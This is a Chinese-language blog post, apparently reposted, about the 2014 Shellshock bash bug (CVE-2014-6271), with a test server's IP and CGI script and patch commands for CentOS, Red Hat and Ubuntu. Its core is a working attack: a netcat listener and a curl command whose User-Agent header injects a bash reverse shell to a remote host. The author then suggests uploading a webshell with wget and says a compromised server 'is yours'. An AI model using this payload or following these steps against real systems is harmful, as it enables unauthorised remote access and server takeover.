最近出了bash命令执行的漏洞,想必大家已经有所耳闻了,但是很多像我一样的小菜不知道怎么测试,还好有大牛帮我们搭建好了测试环境,转载过来大家一起学习研究一下吧。。。此测试环境是习科联创 @夜真灰 牛牛搭建,我已经得到了他的授权,可以转载。。。
关于bash命令执行漏洞的原理,请参考下面的文章:
CVE-2014-6271测试环境
测试系统为Centos5.9
IP地址为23.239.208.105
没有配置iptables和selinux
cgi poc地址为http://23.239.208.105/cgi-bin/poc.cgi
poc.cgi代码如下
#!/bin/bash echo "Content-type: text/html" echo "" echo '' echo '' echo '' echo 'PoC ' echo '' echo '' echo '' /usr/bin/env echo ''
echo ''
echo ''
exit 0测试步骤
首先找一个能监听端口的外网ip,Linux和windows都可以,使用nc监听端口12666,我在这里使用linux
nc -l 12666
在一台外网linux主机上执行poc命令(理论上只了联网的应该就可以的)
curl -A "() { :; }; /bin/bash -i > /dev/tcp/xx.xxx.xx.xxx/12666 0<&1 2>&1" http://23.239.208.105/cgi-bin/poc.cgi就可以将shell反弹出来,那么下面自己找路径,自己wget一个大马上去完全是没有问题的。
我已经测试成功了,想必也难不到其它读者的。。。。。
漏洞修补方法:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"受影响的系统包括:
CentOS
Debian
Redhat
Ubuntu红帽系可通过更新 bash 并重启系统来解决这个问题:
yum update bash或者:
yum update bash-4.1.2-15.el6_5.1此举只是更新了 bash 包,还需要重启系统才能生效。
Ubuntu 用户可以通过如下命令打补丁,无需重启:
apt-get update apt-get install bash另外,据国外可靠消息,打了bash的补丁之后,系统仍然存在bypass的可能。所以我们将继续观望。
服务器如果被提权了,可以任意修改密码,服务器就归你们了。。。
参考文章:
http://drops.wooyun.org/papers/3064
http://bbs.isilic.org/thread-6459-1-1.html
http://www.waitalone.cn/bash-command-exec.html
from www.waitalone.cn.thanks for it.
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论